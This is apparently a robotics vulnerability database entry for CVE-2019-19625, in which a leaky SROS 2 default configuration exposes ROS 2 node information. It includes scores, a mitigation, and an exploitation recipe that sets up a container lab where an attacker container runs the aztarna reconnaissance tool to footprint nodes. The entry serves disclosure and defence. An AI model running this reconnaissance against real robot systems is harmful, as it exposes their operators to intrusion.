Description
cve: CVE-2019-19625
cwe: CWE-200 (Information Exposure)
description: We found that SROS 2, the tools used to generate and distribute keys for ROS 2
and to use the underlying DDS security plugins from ROS 2, leaks node information
due to a leaky default configuration, as indicated at https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13.
This exposure was first raised in the Security Workshop of ROSCon 2019 (Nov. 2019).
Further debugging of the flaw indicates that there might be additional underlying
issues.
exploitation:
description: A simple use of ros2cli is enough to exploit this flaw. See https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
for a walkthrough.
exploitation-image: Not available
exploitation-vector: Not available
exploitation-recipe:
networks:
- network:
- driver: overlay
- name: net1
- encryption: true
- subnet: 12.0.0.0/24
- network:
- driver: overlay
- name: net2
- encryption: false
- subnet: 13.0.0.0/24
containers:
- container:
- name: subject1
- modules:
- base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
- network: net1
- container:
- name: subject2
- modules:
- base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
- volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom
- network: net1
- container:
- name: attacker
- modules:
- base: registry.gitlab.com/aliasrobotics/offensive/alurity/ros2/ros2:2c82f8ff0dba79c00c1ce05198ef86920049a258
- volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_aztarna
- network:
- net1
- net2
flow:
- container:
- name: subject1
- window:
- name: unsecure
- commands:
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "export ROS_DOMAIN_ID=0"
- command: "ros2 run demo_nodes_cpp talker"
- split: horizontal
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "export ROS_DOMAIN_ID=0"
- command: "env | grep ROS" # this shows there's no security enabled at this point
- select: unsecure
- container:
- name: subject2
- window:
- name: secure
- commands:
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "export ROS_DOMAIN_ID=1"
- command: "env | grep ROS" # this shows there's no security enabled at this point
- command: "ros2 run demo_nodes_cpp talker"
- command: "export ROS_SECURITY_ENABLE=true"
- command: "export ROS_SECURITY_STRATEGY=Enforce"
- command: "export ROS_SECURITY_ROOT_DIRECTORY=/opt/ros2_ws/keystore"
- command: "export ROS_SECURITY_LOOKUP_TYPE=MATCH_PREFIX"
- command: "env | grep ROS" # from this point on, there's security enabled
- command: "ros2 run demo_nodes_cpp talker"
- split: horizontal
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "export ROS_DOMAIN_ID=1"
- command: "cd /opt/ros2_ws/"
- command: "mkdir policy"
# generate a security policy based on our current graph
- command: "ros2 security generate_policy policy/my_policy.xml"
- command: "cat policy/my_policy.xml"
# populate the keystore for all profiles
- command: "ros2 security generate_artifacts -k keystore -p policy/my_policy.xml -n /_ros2cli"
- command: "kill -9 $(pidof talker)"
- select: secure
- container:
- name: attacker
- window:
- name: attacker_window
- commands:
- command: "source /opt/ros2_ws/install/setup.bash"
- command: "aztarna -t ros2 -d 0 --daemon -e"
- split: horizontal
- command: "source /opt/ros2_ws/install/setup.bash"
- type: "aztarna -t ros2 -d 1 --daemon -e"
- select: attacker_window
- attach: subject2
flaw:
application: any ROS 2 node communicating
architectural-location: platform code
date-detected: null
date-reported: '2019-12-06'
detected-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
detected-by-method: runtime detection
issue: https://github.com/aliasrobotics/RVD/issues/922
languages: Python
package: sros2
phase: runtime-operation
reported-by: Victor Mayoral Vilches and Lander Usategui San Juan (Alias Robotics)
reported-by-relationship: security researcher
reproducibility: always
reproduction: https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
reproduction-image: Not available
specificity: ROS-specific
subsystem: cognition:middleware
trace: N/A
id: 922
keywords:
- Robot Operating System 2
- ROS 2
- eloquent
- dashing
links:
- https://ros-swg.github.io/ROSCon19_Security_Workshop/
- https://github.com/ros-swg/turtlebot3_demo
- https://github.com/ros2/sros2/blob/master/sros2/sros2/policy/defaults/dds/governance.xml#L13
- https://design.ros2.org/articles/ros2_dds_security.html
- https://asciinema.org/a/SSnSAMlOEoHfqhAuzC1R98STF
mitigation:
date-mitigation: null
description: Modify the policy and set rtps_protection_kind to ENCRYPT
pull-request: https://github.com/ros2/sros2/pull/171
severity:
cvss-score: 7.5
cvss-vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
rvss-score: 6.5
rvss-vector: RVSS:1.0/AV:AN/AC:L/PR:N/UI:N/Y:Z/S:U/C:H/I:N/A:N/H:N
severity-description: high
system: ros2
title: 'RVD#922: SROS2 leaks node information'
type: exposure
vendor: ''